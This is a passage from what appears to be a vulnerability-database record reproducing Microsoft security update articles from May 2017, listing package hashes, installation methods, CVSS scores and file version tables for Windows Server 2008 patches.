DAF22C0C2096613454CB0360D85974BB3F87B4BC2B8E184C50553DC52CE1E9DB \nWindows6.0-KB4018927-x64.msu| 5EA789D60FE935C4CBBB9A8BDEB3B05E51E3928B| AE0CFFDD08F172905419A7F85BC05CB1E17E6A9E1C7ACEF768CC280F72EEC2A6 \nWindows6.0-KB4018927-x86.msu| 20E9C85C9802777CF36FEE0FDDA32A3C00C37A30| F1264F281A8B9BFC9B2C100F55911B119CBD72F72C5BC554E0466DCEA03673EB \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. \n \n**Windows Server 2008 file information**\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## \n\n__\n\nFor all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nMsadcf.dll| 6.0.6002.19770| 176,128| 10-Apr-2017| 22:53| IA-64 \nMsadcf.dll| 6.0.6002.24089| 176,128| 07-Apr-2017| 15:17| IA-64 \nMsadcf.dll| 6.0.6002.19770| 73,728| 10-Apr-2017| 23:03| x86 \nMsadcf.dll| 6.0.6002.24089| 73,728| 07-Apr-2017| 15:24| x86 \n \n## \n\n__\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nMsadcf.dll| 6.0.6002.19770| 90,112| 10-Apr-2017| 23:21| x64 \nMsadcf.dll| 6.0.6002.24089| 90,112| 07-Apr-2017| 15:43| x64 \nMsadcf.dll| 6.0.6002.19770| 73,728| 10-Apr-2017| 23:03| x86 \nMsadcf.dll| 6.0.6002.24089| 73,728| 07-Apr-2017| 15:24| x86 \n \n## \n\n__\n\nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nMsadcf.dll| 6.0.6002.19770| 73,728| 10-Apr-2017| 23:03| x86 \nMsadcf.dll| 6.0.6002.24089| 73,728| 07-Apr-2017| 15:24| x86\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security Update for the Microsoft ActiveX Information Disclosure Vulnerability in Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0242"], "modified": "2017-05-09T07:00:00", "id": "KB4018927", "href": "https://support.microsoft.com/en-us/help/4018927", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-31T14:39:30", "description": "None\n## Summary\n\nAn elevation of privilege exists in Windows COM Aggregate Marshaler. An attacker who successfully exploits the vulnerability could run arbitrary code with elevated privileges. \n \nTo learn more about the vulnerability, go to [the Security Update Guide](<https://portal.msrc.microsoft.com>).\n\n## More Information\n\nImportant\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4018556>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n## More Information\n\n## \n\n__\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4018556-ia64.msu| 78887F2993AED4D8DCEBA958A362134E40F5B116| 8996176D602E9F25899C25CCD9052404F3CCB02FBC265BB38D4A29DFA6A61B2C \nWindows6.0-KB4018556-x64.msu| 4728E8EAC4BD21D2F037349A59540EF40888177D| F399A7F1A58A299C10C72E206665CD23C0182E339F128A4E3835D6DC0ADF3546 \nWindows6.0-KB4018556-x86.msu| 7766800F74B02A4062E52BE4F39B4BB1C17E9849| 254A546922E4052BC2DD0036C67AABED643E6A2F8182C1D1663C9F1582DE1EA6 \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. \n \n**Windows Server 2008 file information** \n\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## \n\n__\n\nFor all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform**| **Service branch** \n---|---|---|---|---|---|--- \nAdvapi32.dll.mui| 6.0.6002.19598| 373,760| 06-Feb-2016| 03:25| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 255,488| 06-Feb-2016| 01:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,536| 06-Feb-2016| 03:04| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 352,768| 06-Feb-2016| 04:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 349,696| 06-Feb-2016| 03:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 346,624| 06-Feb-2016| 04:20| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 338,944| 06-Feb-2016| 03:21| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 373,760| 07-Apr-2017| 16:55| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 255,488| 07-Apr-2017| 15:25| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,536| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 352,768| 07-Apr-2017| 17:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 349,696| 07-Apr-2017| 16:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 346,624| 07-Apr-2017| 16:56| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 338,944| 07-Apr-2017| 16:49| Not applicable| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 1,964,544| 06-Feb-2016| 01:39| IA-64| Not applicable \nAdvapi32.dll| 6.0.6002.24089| 1,963,520| 07-Apr-2017| 15:16| IA-64| Not applicable \nOle32.dll| 6.0.6002.19773| 4,193,792| 14-Apr-2017| 20:16| IA-64| IA64_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll| 6.0.6002.24089| 4,188,160| 07-Apr-2017| 15:17| IA-64| IA64_MICROSOFT-WINDOWS-COM-BASE-QFE \nRpcss.dll| 6.0.6002.19773| 1,216,000| 14-Apr-2017| 20:16| IA-64| IA64_MICROSOFT-WINDOWS-COM-BASE-QFE \nRpcss.dll| 6.0.6002.24089| 1,220,096| 07-Apr-2017| 15:17| IA-64| IA64_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 08:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 23,040| 14-Apr-2017| 21:45| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 08:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 20:18| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 08:16| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,064| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 08:13| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 13,824| 14-Apr-2017| 21:41| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 13:57| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 12,800| 14-Apr-2017| 21:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 13:57| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 9,728| 14-Apr-2017| 21:52| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6001.18000| 3,072| 19-Jan-2008| 13:57| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 9,728| 14-Apr-2017| 21:56| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:49| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 23,040| 07-Apr-2017| 16:53| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 15:20| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 15:23| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:40| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,064| 07-Apr-2017| 16:45| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:54| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 13,824| 07-Apr-2017| 16:55| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:47| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 12,800| 07-Apr-2017| 16:51| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:52| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 9,728| 07-Apr-2017| 16:55| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:42| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 9,728| 07-Apr-2017| 16:46| Not applicable| Not applicable \nComcat.dll| 6.0.6001.18000| 13,312| 19-Jan-2008| 08:26| IA-64| Not applicable \nOleres.dll| 6.0.6002.19773| 23,552| 14-Apr-2017| 19:05| IA-64| Not applicable \nComcat.dll| 6.0.6002.24089| 13,312| 07-Apr-2017| 15:16| IA-64| Not applicable \nOleres.dll| 6.0.6002.24089| 23,552| 07-Apr-2017| 14:36| IA-64| Not applicable \nCsrsrv.dll| 6.0.6002.19680| 145,920| 12-Aug-2016| 18:54| IA-64| Not applicable \nCsrsrv.dll| 6.0.6002.24089| 150,016| 07-Apr-2017| 15:16| IA-64| Not applicable \nKernel32.dll| 6.0.6002.19623| 2,191,360| 18-Mar-2016| 16:33| Not applicable| Not applicable \nKernel32.dll| 6.0.6002.24089| 2,193,920| 07-Apr-2017| 15:16| IA-64| Not applicable \nNtdll.dll| 6.0.6002.19623| 2,575,672| 21-Mar-2016| 22:52| IA-64| Not applicable \nNtdll.dll| 6.0.6002.24089| 2,552,048| 11-Apr-2017| 04:03| IA-64| Not applicable \nOleaut32.dll| 6.0.6002.19773| 2,023,424| 14-Apr-2017| 20:16| IA-64| Not applicable \nOleaut32.dll| 6.0.6002.24089| 2,025,472| 07-Apr-2017| 15:17| IA-64| Not applicable \nNtoskrnl.exe| 6.0.6002.19764| 9,484,008| 06-Apr-2017| 15:57| IA-64| Not applicable \nNtoskrnl.exe| 6.0.6002.24089| 9,469,672| 07-Apr-2017| 15:44| IA-64| Not applicable \nRpcrt4.dll| 6.0.6002.19598| 3,298,816| 06-Feb-2016| 01:41| IA-64| Not applicable \nRpcrt4.dll| 6.0.6002.24089| 3,289,088| 07-Apr-2017| 15:17| IA-64| Not applicable \nSmss.exe| 6.0.6002.19598| 159,232| 06-Feb-2016| 00:36| IA-64| Not applicable \nSmss.exe| 6.0.6002.24089| 159,232| 07-Apr-2017| 14:22| IA-64| Not applicable \nIa32exec.bin| 6.5.6524.0| 8,262,048| 07-May-2014| 23:57| Not applicable| IA64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.19598| 27,648| 06-Feb-2016| 01:41| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWow64.dll| 6.0.6002.19598| 524,288| 06-Feb-2016| 01:42| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWow64cpu.dll| 6.0.6002.19598| 43,008| 06-Feb-2016| 01:42| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWow64win.dll| 6.0.6002.19598| 617,984| 06-Feb-2016| 01:42| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWowia32x.dll| 6.5.6563.0| 88,576| 06-Feb-2016| 01:42| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nIa32exec.bin| 6.5.6524.0| 8,262,048| 07-Mar-2016| 23:41| Not applicable| IA64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.24089| 27,648| 07-Apr-2017| 15:17| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWow64.dll| 6.0.6002.24089| 524,288| 07-Apr-2017| 15:18| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWow64cpu.dll| 6.0.6002.24089| 43,008| 07-Apr-2017| 15:18| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWow64win.dll| 6.0.6002.24089| 617,984| 07-Apr-2017| 15:18| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nWowia32x.dll| 6.5.6563.0| 88,576| 07-Apr-2017| 15:18| IA-64| IA64_MICROSOFT-WINDOWS-WOW \nComcat.dll| 6.0.6000.16386| 7,168| 02-Nov-2006| 09:46| x86| Not applicable \nOleres.dll| 6.0.6002.19773| 23,552| 14-Apr-2017| 19:01| x86| Not applicable \nComcat.dll| 6.0.6002.24089| 7,168| 07-Apr-2017| 15:23| x86| Not applicable \nOleres.dll| 6.0.6002.24089| 23,552| 07-Apr-2017| 14:31| x86| Not applicable \nKernel32.dll| 6.0.6002.19623| 861,696| 18-Mar-2016| 17:10| x86| Not applicable \nKernel32.dll| 6.0.6002.24089| 862,720| 07-Apr-2017| 15:25| x86| Not applicable \nNtdll.dll| 6.0.6002.19623| 1,171,488| 21-Mar-2016| 22:52| x86| Not applicable \nNtdll.dll| 6.0.6002.24089| 1,167,880| 11-Apr-2017| 04:03| x86| Not applicable \nOleaut32.dll| 6.0.6002.19773| 574,464| 14-Apr-2017| 20:31| x86| Not applicable \nOleaut32.dll| 6.0.6002.24089| 574,464| 07-Apr-2017| 15:24| x86| Not applicable \nRpcrt4.dll| 6.0.6002.19598| 679,424| 06-Feb-2016| 02:12| x86| Not applicable \nRpcrt4.dll| 6.0.6002.24089| 678,912| 07-Apr-2017| 15:25| x86| Not applicable \nAcwow64.dll| 6.0.6002.19598| 43,008| 06-Feb-2016| 02:11| x86| WOW64_MICROSOFT-WINDOWS-WOW \nInstnm.exe| 6.0.6002.19598| 7,680| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.19598| 14,336| 06-Feb-2016| 02:12| x86| WOW64_MICROSOFT-WINDOWS-WOW \nSetup16.exe| 3.1.0.1918| 26,112| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nUser.exe| 6.0.6002.19598| 2,560| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nWow32.dll| 6.0.6002.19598| 5,120| 06-Feb-2016| 02:12| x86| WOW64_MICROSOFT-WINDOWS-WOW \nAcwow64.dll| 6.0.6002.24089| 43,008| 07-Apr-2017| 15:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nInstnm.exe| 6.0.6002.24089| 7,680| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.24089| 14,336| 07-Apr-2017| 15:24| x86| WOW64_MICROSOFT-WINDOWS-WOW \nSetup16.exe| 3.1.0.1918| 26,112| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nUser.exe| 6.0.6002.24089| 2,560| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nWow32.dll| 6.0.6002.24089| 5,120| 07-Apr-2017| 15:25| x86| WOW64_MICROSOFT-WINDOWS-WOW \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:17| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 266,240| 06-Feb-2016| 02:20| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 02:57| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 03:28| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 04:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 356,352| 06-Feb-2016| 03:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 348,160| 06-Feb-2016| 04:33| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 266,240| 07-Apr-2017| 15:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 356,352| 07-Apr-2017| 16:52| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 348,160| 07-Apr-2017| 16:44| Not applicable| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 802,304| 06-Feb-2016| 02:11| x86| Not applicable \nAdvapi32.dll| 6.0.6002.24089| 802,816| 07-Apr-2017| 15:22| x86| Not applicable \nOle32.dll| 6.0.6002.19773| 1,321,472| 14-Apr-2017| 20:31| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll| 6.0.6002.24089| 1,318,912| 07-Apr-2017| 15:24| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:30| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:50| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 20:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:43| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:19| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 07-Nov-2006| 03:40| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:29| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 08-Nov-2006| 07:09| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:22| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 15:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 15:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:32| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:35| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:40| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:35| Not applicable| Not applicable \n \n## \n\n__\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform**| **Service branch** \n---|---|---|---|---|---|--- \nAdvapi32.dll.mui| 6.0.6002.19598| 371,200| 06-Feb-2016| 04:25| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 379,392| 06-Feb-2016| 04:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 376,832| 06-Feb-2016| 04:22| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 373,760| 06-Feb-2016| 04:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 04:44| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 255,488| 06-Feb-2016| 02:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 381,952| 06-Feb-2016| 04:02| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 375,808| 06-Feb-2016| 03:20| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,536| 06-Feb-2016| 03:12| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 366,080| 06-Feb-2016| 03:13| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 383,488| 06-Feb-2016| 05:05| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 380,928| 06-Feb-2016| 03:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 352,768| 06-Feb-2016| 03:55| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 349,696| 06-Feb-2016| 05:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 374,272| 06-Feb-2016| 03:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 380,416| 06-Feb-2016| 04:29| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,536| 06-Feb-2016| 03:07| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 379,392| 06-Feb-2016| 04:33| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 379,904| 06-Feb-2016| 04:41| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,536| 06-Feb-2016| 03:18| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 375,296| 06-Feb-2016| 03:14| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 375,296| 06-Feb-2016| 04:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 346,624| 06-Feb-2016| 03:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 338,944| 06-Feb-2016| 04:19| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 371,200| 07-Apr-2017| 17:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 379,392| 07-Apr-2017| 17:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 376,832| 07-Apr-2017| 17:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 373,760| 07-Apr-2017| 17:10| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 17:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 255,488| 07-Apr-2017| 15:52| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 381,952| 07-Apr-2017| 17:12| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 375,808| 07-Apr-2017| 17:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,536| 07-Apr-2017| 17:04| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 366,080| 07-Apr-2017| 17:05| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 383,488| 07-Apr-2017| 17:07| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 380,928| 07-Apr-2017| 17:16| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 352,768| 07-Apr-2017| 17:13| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 349,696| 07-Apr-2017| 17:07| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 374,272| 07-Apr-2017| 17:14| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 380,416| 07-Apr-2017| 17:15| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,536| 07-Apr-2017| 17:06| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 379,392| 07-Apr-2017| 17:10| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 379,904| 07-Apr-2017| 17:12| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,536| 07-Apr-2017| 17:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 375,296| 07-Apr-2017| 17:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 375,296| 07-Apr-2017| 17:11| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 346,624| 07-Apr-2017| 17:05| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 338,944| 07-Apr-2017| 17:05| Not applicable| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 1,067,008| 06-Feb-2016| 01:59| x64| Not applicable \nAdvapi32.dll| 6.0.6002.24089| 1,067,520| 07-Apr-2017| 15:42| x64| Not applicable \nOle32.dll| 6.0.6002.19773| 1,910,784| 14-Apr-2017| 20:38| x64| AMD64_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll| 6.0.6002.24089| 1,918,464| 07-Apr-2017| 15:43| x64| AMD64_MICROSOFT-WINDOWS-COM-BASE-QFE \nRpcss.dll| 6.0.6002.19773| 720,896| 14-Apr-2017| 20:38| x64| AMD64_MICROSOFT-WINDOWS-COM-BASE-QFE \nRpcss.dll| 6.0.6002.24089| 722,944| 07-Apr-2017| 15:44| x64| AMD64_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Dec-2006| 03:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 16,896| 14-Apr-2017| 21:54| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 08-Jan-2007| 19:56| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 19,968| 14-Apr-2017| 21:50| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 21-Nov-2006| 03:26| Not 